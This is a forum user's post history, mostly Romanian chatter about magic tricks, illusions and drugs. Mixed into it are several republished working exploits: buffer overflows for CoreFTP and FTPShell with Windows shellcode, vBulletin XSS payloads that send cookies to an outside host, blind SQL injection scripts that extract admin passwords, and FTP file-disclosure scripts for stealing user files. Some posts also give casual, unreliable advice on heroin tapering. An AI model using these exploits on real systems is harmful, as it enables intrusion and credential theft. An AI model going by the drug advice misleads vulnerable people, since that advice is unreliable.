-
Posts
778 -
Joined
-
Last visited
-
Days Won
2
Everything posted by Marian
-
Fi?ierul cerut a fost ?ters. Niciun link nu merge
-
isi baga degetele in pizda ca sa scoata servetzelu )) penala faza:)))))))00
-
Preoti danseaza pe manele Fara numaaaaaaaar!!!!
-
101 Magic Tricks Asta e mijto Superhandz - Home HANDLORDZ PRO FORUMS - Message Board Yuku Home Handlordz Forums - Powered by vBulletin Magic Tricks - Learn Card Tricks and Street Magic | Ellusionist THEORY11 :: Underground Magic & Cardistry Epicenter : Learn Magic Tricks & Card Flourishing Penguin Magic - All Levels - Leading Internet Magic Shop Magic tricks Free Magic Tricks Learn Cool Coin And Card Tricks Learn Free Magic Tricks - We Update Our Website Daily - 100% Free Magic Trick Website! LEARN MAGIC | LEARN MAGIC TRICK | LEARN MAGIC TRICKS - Home Easy Card Tricks Free Card Magician Secrets Revision3 > Scam School Google
-
YouTube - JoinTu` arde
-
Buruienele au un efect halucinogen mai mic decat apa. Mai bine fumezi buruieni (iarba) decat sa bei apa . Am auzit ca dupa ce te lasi de apa sevrajul este insuportabil Alegeti ceea ce credeti ca e mai bine.
-
# # Vulnerability : CoreFTP v2.1 b1637 (password field) Universal BOF exploit # Found by : mr_me (seeleymagic [at] hotmail [dot] com) # Coded by : mr_me & corelanc0d3r # Download from : http://www.coreftp.com/download.html # Tested on : XP SP3 En (VirtualBox) # Greetz to : corelanc0d3r, EdiStrosar, jnz, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team # Advisory : http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-007-coreftp-password-field-stack-buffer-overflow/ # # Thanks to Dr_IDE for pointing me to this app # Notes: This app was compiled with safeSEH, so a call dword did the trick # If you manage to convince a user to input a 6000 length string as a password # then they deserve to be owned...! # # Usage: Quick connect --> Advanced --> SSH --> password --> bind shell # # mrme@backtrack:~$ nc -v 192.168.2.9 4444 # 192.168.2.9: inverse host lookup failed: Unknown server error : # Connection timed out # (UNKNOWN) [192.168.2.9] 4444 (?) open # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\PROGRA~1\CoreFTP> # print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] CoreFTP v2.1 b1637 (password field) Universal BOF exploit" sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a"); print "[+] Creating evil buffer string in overflowpassword.txt, ph33r" stuff = "\x41" * 145 stuff += "\x90" * 5 stuff += sc stuff += "\x41" * (1008-len(stuff)-5) stuff += "\xe9\x7c\xfc\xff\xff" # Lets fly stuff += "\xeb\xf9\x90\x90" # Jump back stuff += "\x0b\x0b\x27\x00" # partial/null overwrite pwn = open('overflowpassword.txt','w'); pwn.write(stuff); pwn.close();
-
# Title: vBulletin Version 3.5.2 - Introduction XSS scripting # Author: Discovered by ROOT_EGY # Version: vBulletin Version 3.5.2 =============================================== WWW.sec-war.com =============================================== 3.5.2 - Introduction XSS scripting The vulnerability is in the field «title» scenario «calendar.php». Example: TITLE :---> Test <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document.cookie; </ script> BODY :----> No matter OTHER OPTIONS: -> No matter That all went off to go to the calendar, create a new event in the header to prescribe <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s.jpg?» + Document. cookie; </ script>, then go look at the link, which is our event and give to the show to someone who want to steal a cookie. 3.5.3 - Introduction XSS scripts in the field «Email Address» in the module «Edit Email & Password». Example: www.server.som/forumpath/profile.php?do=editpassword pass: your pass email: vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ document.cookie; </ script> . nomatt Note About lenght limitation **** forum / profile.php? do = editoptions Receive Email from Other Members = yes **** www.server.com/forumpath/sendmessage.php?do=mailmember&u = (your id) In the email write vashe@milo.com "> <script> img = new Image (); img.src =« http://antichat.ru/cgi-bin/s.jpg? »+ Document.cookie; </ script>. nomatt. Once preserved, it is important to make the option email visible to all. Then the helmet someone www.xhh777hhh.som/forumpath/sendmessage.php?do=mailmember&u = (your id) and get a cookie on our address sniffer. 3.5.4 - Dump database The vulnerability is in the scripts directory upgrade_301.php 'install'. Example: server.com/forumpath/install/upgrade_301.php?step=SomeWord 3.5.4 - Introduction XSS scripting The vulnerability is in the url parameter scenario inlinemod.php. Example: www.server.com/forumpath/inlinemod.php?do=clearthread&url=lala2% 0d% 0aContent-Length:% 2033% 0d% 0a% 0d% 0a <html> Hacked! </ Html>% 0d% 0a% 0d% 0a =============================================== ROOT_EGY to connect: r0t@hotmail.es =============================================== Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends. ===============================================
-
cityadmin (links.php) Blind Sql Injection Vulnerability ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Team : Sec Attack Team .:. Home : www.sec-attack.com/vb .:. Script : cityadmin .:. Download Script: http://www.redcow.ca/products/cityadmin/ .:. Bug Type : Blind Sql Injection .:. Dork : "Powered by cityadmin and Red Cow Technologies, Inc." #################################################################### ===[ Exploit ]=== www.site.com/links.php?id=[Blind SQL INJECTION] www.site.com/links.php?id=NULL+and+1=1 >>> True www.site.com/links.php?id=NULL+and+1=2 >>> False www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=5 >>> True www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=4 >>> False #################################################################### Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
-
#!/usr/bin/perl #//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\# #\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////# # # # [o] PHP Pro Bid Blind SQL Injection Exploit # # # # Software : PHP Pro Bid # # Vendor : http://www.phpprobid.com/ # # Author : NoGe # # Contact : noge[dot]code[at]gmail[dot]com # # Blog : http://evilc0de.blogspot.com - http://pacenoge.org # # # # [o] Usage # # # # root@noge:~# perl bid.pl # # # # # # [+] URL Path : www.target.com/[path] # # [+] Valid ID : 1 # # [+] Column : username # # # # [!] Exploiting http://www.target.com/[path]/ ... # # # # [+] SELECT username FROM probid_admins LIMIT 0,1 ... # # [+] result> admin # # # # [!] Exploit completed. # # # # [o] Greetz # # # # Anti Security [ http://antisecurity.org ] # # Vrs-hCk OoN_GaY Paman bL4Ck_3n91n3 Angela Zhang aJe # # H312Y yooogy mousekill }^-^{ loqsa zxvf martfella # # skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke # # # # --=]> COPY MY STYLE BY SAYKOJI <[=-- # # # # FUCK MALAYSIA!!! # # DON'T YOU HAVE YOUR OWN CULTURE? # # AHH I FORGOT.. YOU DON'T HAVE ANY CULTURE. HAHAHAHA... # # # #//////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\# #\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\//////////////////////////////////# # table : probid_admins # column : username and password use HTTP::Request; use LWP::UserAgent; $cmsapp = 'crotz'; $vuln = 'auction_details.php?auction_id='; $table = 'probid_admins'; $column = 'password'; $regexp = '<td align="center"><img src="'; $maxlen = 32; my $OS = "$^O"; if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); } printf "\n $cmsapp [x]=======================================[x] | PHP Pro Bid Blind SQL Injection Exploit | | [F]ound by NoGe | [x]=======================================[x] \n"; print "\n [+] URL Path : "; chomp($web=<STDIN>); print " [+] Valid ID : "; chomp($id=<STDIN>); print " [+] Column : "; chomp($column=<STDIN>); if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; } print "\n\n [!] Exploiting $target ...\n\n"; &get_data; print "\n\n [!] Exploit completed.\n\n"; sub get_data() { print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n"; syswrite(STDOUT, " [+] result> ", 20); for (my $i=1; $i<=$maxlen; $i++) { my $chr = 0; my $found = 0; my $char = 48; while (!$chr && $char<=57) { if(exploit($i,$char) =~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } if(!$chr) { $char = 97; while(!$chr && $char<=122) { if(exploit($i,$char) =~ /$regexp/) { $chr = 1; $found = 1; syswrite(STDOUT,chr($char),1); } else { $found = 0; } $char++; } } if (!$found) { print "\n\n [!] Exploit completed.\n\n"; exit; } } } sub exploit() { my $limit = $_[0]; my $chars = $_[1]; my $blind = '+and+substring((select+'.$column.'+from+'.$table.'+limit+0,1),'.$limit.',1)=char('.$chars.')'; my $inject = $target.$vuln.$id.$blind; my $content = get_content($inject); return $content; } sub get_content() { my $url = $_[0]; my $req = HTTP::Request->new(GET => $url); my $ua = LWP::UserAgent->new(); $ua->timeout(15); my $res = $ua->request($req); if ($res->is_error){ print "\n\n [!] Error, ".$res->status_line.".\n\n"; exit; } return $res->content; } # milw0rm.com [2009-09-14]
-
#!/usr/bin/perl # ftpdmin 0.96 Arbitrary File Disclosure Exploit # Vulnerability Disclosure by 1 Slach or 2 Slach # Tested on Win XP SP2 but it work in other box environment # Abouts Exploit : first thing after we exec the application it make our box a simple ftp server # so like we see if we want conect in ftp we make that's cmd >> ftp 127.0.0.1 >> user & password allright # but here our application make an ftp link for exec and partage some file in our box # so we profite with this partage fontion to get some importent file in server like boot.ini for example # for that's i make this exploit it conect to ftp trget via 21 port and if after with a single or doble slach we wrote # our importent file like boot.ini # so this the end of all # message for (ks) use your mind to have more importent thing in server use LWP::Simple; use LWP::UserAgent; if (@ARGV < 3) { print("Usage: $0 <url> <port> <filename> <target> \n"); print("TARGETS are\n "); print("Define full path with file name \n"); print("Example FTP: perl $0 127.0.0.1 21 boot.ini \n"); exit(1); } ($target, $port,$filename) = @ARGV; print("ftpdmin 0.96 Exploit : Coded by Stack!\n"); print("Attacking $target on port $port!\n"); print("FILENAME: $filename\n"); $temp="/" x 2; my $url= "ftp://". $target. ":" . $port .$temp . $filename; $content=get $url; print("\n FILE CONTENT STARTED"); print("\n -----------------------------------\n"); print("$content"); print("\n -------------------------------------\n"); # milw0rm.com [2009-04-13]
-
#!/usr/bin/perl -w # # This Bug Similar to others found By My Friend : Stack <= so special Thanx # So You Can Exploit Arbitrary File Disclosure From The Server <== You can use Stack's Exploit To do That # But This Exploit i will get Users & Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat # In This Exploit I Used The Port 80 You can use any port you want 21 ################################################################################################################################# #23/04/2009 13:20:25 FTP Server started on port 80. #23/04/2009 13:25:43 [0000000002] Client connected from 127.0.0.1. #23/04/2009 13:25:43 [0000000002] 220- **************************************** #23/04/2009 13:25:43 [0000000002] 220- #23/04/2009 13:25:43 [0000000002] 220- Welcome to Dream FTP Server #23/04/2009 13:25:43 [0000000002] 220- Copyright 2002 - 2004 #23/04/2009 13:25:43 [0000000002] 220- BolinTech Inc. #23/04/2009 13:25:43 [0000000002] 220- #23/04/2009 13:25:43 [0000000002] 220- **************************************** #23/04/2009 13:25:43 [0000000002] 220- #23/04/2009 13:25:43 [0000000002] 220 #23/04/2009 13:25:43 [0000000002] USER anonymous #23/04/2009 13:25:43 [0000000002] 331 Password required for anonymous #23/04/2009 13:25:43 [0000000002] PASS ********** #23/04/2009 13:25:43 [0000000002] 230 User successfully logged in. #23/04/2009 13:25:43 [0000000002] PWD #23/04/2009 13:25:43 [0000000002] 257 "/" is current directory. #23/04/2009 13:25:43 [0000000002] TYPE I #23/04/2009 13:25:43 [0000000002] 200 Type set to I #23/04/2009 13:25:43 [0000000002] CWD Program Files #23/04/2009 13:25:43 [0000000002] 250 "/Program Files" is current directory. #23/04/2009 13:25:43 [0000000002] CWD BolinTech #23/04/2009 13:25:43 [0000000002] 250 "/Program Files/BolinTech" is current directory. #23/04/2009 13:25:43 [0000000002] MDTM users.dat #23/04/2009 13:25:43 [0000000002] 502 Command not implemented - Try HELP. #23/04/2009 13:25:43 [0000000002] PASV #23/04/2009 13:25:43 [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145). #23/04/2009 13:25:43 [0000000002] RETR users.dat #23/04/2009 13:25:43 [0000000002] 150 Opening BINARY mode data connection for file transfer. #23/04/2009 13:25:43 [0000000002] 226 Transfer complete #23/04/2009 13:25:43 [0000000002] Client disconnected from 127.0.0.1. ################################################################################################################################# # Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html # Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers ################################################################################################################################# # welcome To : WwW.Ma-HaxOrZ.CoM/vb <== Is Online ################################################################################################################################# # Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png ################################################################################################################################# use LWP::Simple; use LWP::UserAgent; print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n"; print "\t****************************************************************\n"; print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n"; print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n"; print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n"; print "\t* From : MoroccO Figuig/Oujda City *\n"; print "\t****************************************************************\n\n\n\n"; if(@ARGV < 3) { &help; exit(); } sub help() { print "[X] Usage : perl $0 HackerName IP Port \n"; print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n"; } ($HackerName, $TargetIP, $AttackedPort) = @ARGV; print("Please Wait ! Connecting To The Server ......\n\n"); sleep(5); print(" ******************************\n"); print(" * Status *\n"); print(" ******************************\n"); print("$HackerName , AttaCking The Target : $TargetIP \n"); print("On The Port : $AttackedPort , Just To Get Users/Passwords File \n"); $terget1="Program Files"; $target2="BolinTech"; $target3="users.dat"; $slash="/"; $TargetFile=$terget1.$slash.$target2.$slash.$target3; $temp="/" x 2; my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile; print("Exploiting .....> |80\n"); sleep(15); print("Exploiting ..........|Done!\n"); sleep(5); $Disclosure=get $boom; print("\n\n\n\n............File Contents Are Just Below...........\n"); print("$Disclosure \n"); print(".........................EOF.......................\n"); print("Done For Fun //Figuigian HaCker\n"); print("Some Womens Makes The World Special , Just By Being On it <3\n"); # milw0rm.com [2009-04-23]
-
#!/usr/bin/python # _ _ _ __ _ _ _ #| || | (_) ___ / \ | |__ | | | #| __ | | | (_-< | () | | / / |_ _| #|_||_| |_| /__/ \__/ |_\_\ |_| # #[+] Bug : FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ) #[+] Author : His0k4 #[+] Tested on : xp_sp3,w2k_sp4 #[+] Greetz : All friends # piece of "zlabiya" #---exploit-log--- #attacker@dz-labs:~/pentests/fuzzers/ftp$ python FTPShell_client.py #[+] Listening on [FTP] 21 #[+] Connection accepted from: 192.168.1.3 #[+] Sending the malicious pasv response... #[+] Done, wait for trying to connect to port 4444 on the target... # #(UNKNOWN) [192.168.1.3] 4444 (?) open #Microsoft Windows XP [Version 5.1.2600] #(C) Copyright 1985-2001 Microsoft Corp. # #C:\Documents and Settings\victim\Desktop> from socket import * import os import time # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com stage2 =( "\x44\x7A\x32\x37\x44\x7A\x32\x37" "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38" "\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x34\x4e\x43\x4b\x58\x4e\x57" "\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38" "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38" "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48" "\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x44" "\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x38" "\x49\x58\x4e\x56\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d" "\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48" "\x42\x37\x4e\x31\x4d\x4a\x4b\x38\x42\x44\x4a\x30\x50\x35\x4a\x36" "\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46" "\x43\x55\x48\x46\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x57\x43\x57" "\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x56\x44\x30" "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45" "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x55\x43\x54" "\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x51" "\x4e\x55\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x36\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51" "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d" "\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x44\x47\x55\x4f\x4f\x48\x4d" "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46" "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55" "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x56\x43\x36" "\x4d\x36\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x55\x49\x52\x4e\x4c" "\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x32" "\x43\x39\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x54\x4f\x4f" "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x45\x41\x35\x41\x55\x4c\x46" "\x41\x30\x41\x55\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36" "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f" "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" "\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x43\x55\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a") stage1=( #[*] Using Msf::Encoder::PexAlphaNum with final size of 141 bytes "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x48\x36\x41\x38\x4c\x4c" "\x4f\x4f\x4f\x50\x44\x34\x44\x55\x4c\x46\x44\x50\x4a\x35\x4d\x4c" "\x50\x52\x4e\x33\x45\x30\x4c\x35\x46\x37\x4f\x4e\x4a\x4b\x46\x54" "\x4c\x47\x44\x43\x47\x33\x4b\x58\x4c\x4f\x4f\x4a\x45\x37\x4c\x4e" "\x4f\x4a\x45\x57\x47\x4e\x4f\x4f\x47\x4e\x4c\x50\x5a") buffer = stage1 #<---------------------------------| buffer += '\x41'*(412-len(stage1)) # | buffer += '\xC5\xB3\x43\x00' # add esp,8;retn----| s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 21)) s.listen(1) print "[+] Listening on [FTP] 21" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.send("220 Hey victim batet fik!\r\n") c.recv(1024) time.sleep(0.5) c.send("331 User anonymous OK Password required\r\n") c.recv(1024) time.sleep(0.5) c.send("230 Ok.\r\n") c.recv(1024) # Enable this when client performs CWD command #time.sleep(1) #c.send("250 CWD command successful.\r\n") #c.recv(1024) time.sleep(0.5) c.send("257 \x22/\x22 is current directory\r\n") c.recv(1024) time.sleep(0.5) c.send("200 Type set to A.\r\n") c.recv(1024) time.sleep(0.5) print "[+] Sending the malicious pasv response..." c.send("227 "+stage2+"\r\n" "227 Entering Passive Mode ("+buffer+").\r\n" "\r\n") time.sleep(2) c.close() s.close() print("[+] Done, wait for trying to connect to the target on port 4444...\n") time.sleep(25) os.system("nc -nv "+addr[0]+" 4444") # milw0rm.com [2009-09-09]
-
Eu cand ma concentrez jos la picior se invarte invers Nu cred ca se poate numi iluzie dar se invarte cum vrei tu... si in stanga si in dreapta.
-
Femeie care se roteste in ambele sensuri Daca poti sa-ti controlezi privirea poti sa o faci sa se roteasca in ce sens vrei tu! Eu am vazut-o ca se invartea in partea stanga... m-am uitat vreo 30 de secunde la ea si apoi se invartea numai in partea dreapta WTF?
-
Nu ai dat de Nytro pana acum ))0 Welcome
-
@tjt_hk Nu cred ca trebuie sa critici omul asa in felul asta. Nu am folosit niciodata heroina dar stiu cum este dupa iarba. Nu mai postati aiurea deoarece se panicheaza repede si se duce sa-si faca inca o doza ca sa ii treaca panica. Eu nu pot spune ca stiu prin ce trece un drogat dupa heroina. Nu stiu ce e ala sevraj dar stiu ca e foarte dureros. Efectele pe termen lung sunt de panica, paranoia etc. Sugerez sa nu mai postati aiurea... Ma gandesc si la sanatatea lui deoarece nu a stiut ce face cand se droga. In caz ca nu stiati... heroina da dependenta de la prima doza si e foarte greu sa te lasi. Iti controleaza mintea fara sa iti dai seama. Ai impresia ca tu controlezi situatia dar nu e deloc asa. So... mai bine nu mai postati PS: Du-te la o clinica de dezintoxicare daca vrei sa scapi sau incearca sa reduci dozele din ce in ce mai mult. Inlocc de o doza la 2-3 zile ia o doza la 5-6 zile si apoi la 10-15 zile apoi incearca sa uiti. Dupa ce te vei lasa nu vei scapa de efectele negative pe termen lung cum ar fi paranoia, insomnie, sentimentul de persecutie etc!
-
Ce as putea sa spun ))))... Nu numai ca e prost dar e si analfabet
-
Castig curent: $3 Nu e o suma mare dar am facut bani fara sa`mi dau seama ))) Ce dreaq... eu uploadez programe ca se descarca cu viteza mare. nici nu stiam ca dau bani astia de la fisierulmeu Am dat la castiguri... wtf?
-
Dar la tine la tzara nu se exista licee? Mate-info? hjj Ar fi o idee. Iti recomand un profil sportiv
-
Iarba nu`ti place? Romantismul ? wtf?
-
Pai ce dreaq tu ai 15 ani .
-
Nane-poveste de seara